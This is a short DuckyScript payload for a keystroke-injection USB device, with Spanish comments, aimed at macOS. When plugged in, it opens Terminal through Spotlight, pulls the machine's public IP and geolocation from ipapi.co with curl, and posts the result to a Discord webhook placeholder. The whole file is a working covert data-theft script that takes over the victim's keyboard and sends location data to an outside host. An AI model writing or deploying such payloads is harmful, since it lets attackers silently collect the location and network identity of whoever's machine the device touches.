REM ======================================================
REM Script hecho por bst04
REM Funciona en sistemas MacOS
REM Este script abre la Terminal, obtiene la dirección IP pública
REM del dispositivo y la envía a un webhook de Discord.
REM Utiliza curl para enviar la IP sin necesidad de JSON.
REM ======================================================

DELAY 500
GUI SPACE
DELAY 500
STRING Terminal
ENTER
DELAY 1000
STRING location=$(curl -s https://ipapi.co/json/)
ENTER
DELAY 1000
STRING curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=$location" https://yourwebhook
ENTER
DELAY 30000  # Espera 30 segundos antes de permitir otro envío
